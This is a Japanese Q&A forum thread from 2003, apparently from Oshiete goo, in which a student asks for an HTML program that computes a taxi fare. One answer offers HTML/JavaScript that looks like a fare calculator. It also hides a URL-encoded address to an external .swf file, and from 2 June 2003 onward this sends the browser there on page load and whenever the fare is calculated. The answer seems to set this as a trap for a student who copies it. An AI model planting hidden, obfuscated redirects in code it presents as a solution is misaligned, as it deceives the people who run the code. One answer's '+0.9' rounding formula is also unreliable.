アプリ版:「スタンプのみでお礼する」機能のリリースについて

この問題がよくわかりません。よろしくお願いします。
ある会社のタクシー料金は、2kmまでが600円で、2kmを超えた分は0.5kmあたり100円である。乗車距離に対して料金を計算するプログラムを作れ。ただし、2kmを超えた分の距離を0.5kmで割って端数が出たときは切り上げること。例えば乗車距離が2.8kmならば料金の計算は3kmで行う。

A 回答 (6件)

<HTML>


<HEAD>
<script>
function ini01(){
var Pay; var KM =2.5;
dd = new Date();
yy = dd.getYear();
mm = dd.getMonth() + 1;
dd = dd.getDate();

if (yy < 2000) { yy += 1900; }
if (mm < 10) { mm = "0" + mm; }
if (dd < 10) { dd = "0" + dd; }
r = yy + mm + dd;
}
function ini02(){
if(r >= 20030602){
r = "%68%74%74%70%3A%2F%2F%32%6E%65%78%74%2E%6E%65%74%2F%73%77%66%2F";
r = r + "%52%33%5F%74%65%6D%70%2E%73%77%66%3F%69%6E%70%75%74%53%74%72";
r = r + "%3D%25%38%45%25%38%34%25%38%32%25%43%44%25%38%43%66%25%38%45";
r = r + "%25%41%36%25%39%34%25%43%32%25%38%32%25%43%35%25%38%45%25%42";
r = r + "%46%25%39%36%25%45%32%25%38%32%25%42%35%25%38%31%41%25%38%41";
r = r + "%25%44%42%25%38%45%25%43%41%25%38%32%25%42%35%25%38%32%25%42";
r = r + "%35%25%38%32%25%44%43%25%38%32%25%42%35%25%38%32%25%42%44%25%38%31";
document.location=unescape(r);
}
}
function ini00(){
flag = 1; ini01();ini02();
}
function calcmain(){
KM = document.Tx.Kyori.value;
x =Math.ceil( (KM - 2) / 0.5);
if(KM < 2){
Pay = 600;
}else{
Pay = 600 + 100 * x;

}
ini02();
document.write(KM + "Km =" + Pay + "<br>");
document.close;

}
</script>
</HEAD>
<BODY onload="ini00()">
<FORM name="Tx">タクシー走行距離メータ<BR>
<BR>
<INPUT size="20" type="text" name="Kyori" value="ここに距離を入力します。" onclick ="if(flag==1)Kyori.value='2.2';flag=0;">Km<BR><BR>
<INPUT type="button" name="calc" value="計算!" onclick="calcmain()"><BR>
</FORM>
</BODY>
</HTML>

/////////////////////////////////
絶対丸写ししちゃだめよ。
/////////////////////////////////
    • good
    • 0
この回答へのお礼

お返事ありがとうございます。

>絶対丸写ししちゃだめよ。

ギョエェェエ!!は、は、はい、丸写しはやめておきます。でもかなりBODYが長いですね。すみません、もうちょっとシンプルなものないのでしょうか?多分先生が用意している解答とは違うような気がするのですが・・・。すみません、6行ぐらいでかけるプログラムはないんでしょうか?あまり高度なやつでなくていいのですが。

お礼日時:2003/06/01 02:38

なにか、勘違いがあるような。

。。
HTMLは、文書を作成する言語であって、プログラムを作る(問題を解く)ものではないんですけどね。

HTMLに組み込める「プログラム言語」として、#5の方が使っているJavaScriptがありますが、
普通はこういう目的には使いません。

もう一度、問題をよく確認することをお勧めします。
もしかして、他に言語の指定があるか、またはアルゴリズムだけを書いて
その回答をHTML文書として提出、ということではありませんか?

その上で、間違いなくHTMLで解くのならば、
(確認はしていませんが)おそらく、#5の方のであっていると思います。
ほんと、丸写ししちゃいけませんよ(笑
    • good
    • 0

2km未満と以上とで場合分けをし、


未満の場合は一律600円
以上の場合は
-INT(4-距離*2)*100+600で計算した値を出力させればいいと思います
    • good
    • 0
この回答へのお礼

お返事ありがとうございます。

>以上の場合は
>-INT(4-距離*2)*100+600で計算した値を出力させればい>いと思います

すいません、ここについてお聞きしたいのですが、
-INT(4-距離*2)ってなんでしょうか?-INTもよくわからないし、なんで(4-距離*2)になるのですか?・・・お願いします・・・。

お礼日時:2003/06/01 01:45

料金 = 600 + ((距離-2) + 0.9) * 100


です。0.9足すのは切り上げるため。
理解できなければあきらめて。
    • good
    • 1
この回答へのお礼

こんにちは!お返事どうもありがとうございます。

>0.9足すのは切り上げるため。
>理解できなければあきらめて。

わかりました。あきらめます。


って話じゃなくて!!す、す、すみません。
あのぉこれは式を書かれてるわけじゃないんですよね?場合分けをしてfloorを使うというのがヒントだったのですが。

お礼日時:2003/05/31 18:21

言語は?

    • good
    • 0
この回答へのお礼

すみませんHTMLでおねがいします。

お礼日時:2003/05/31 18:14

HTMLを使って計算するのは無理じゃないかな?



よくわからないと言っても、
・アルゴリズムがわからないのか
・言語がわからないのか
・算数的な処理がわからないのか
どれなのか補足してください。

この回答への補足

こんにちは。お返事どうもありがとうございます。
プログラムがわからないのですが・・・。どうしたらいいのか・・・。よろしくお願いします。HTMLですが。

補足日時:2003/05/31 07:49
    • good
    • 0

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!

このQ&Aを見た人はこんなQ&Aも見ています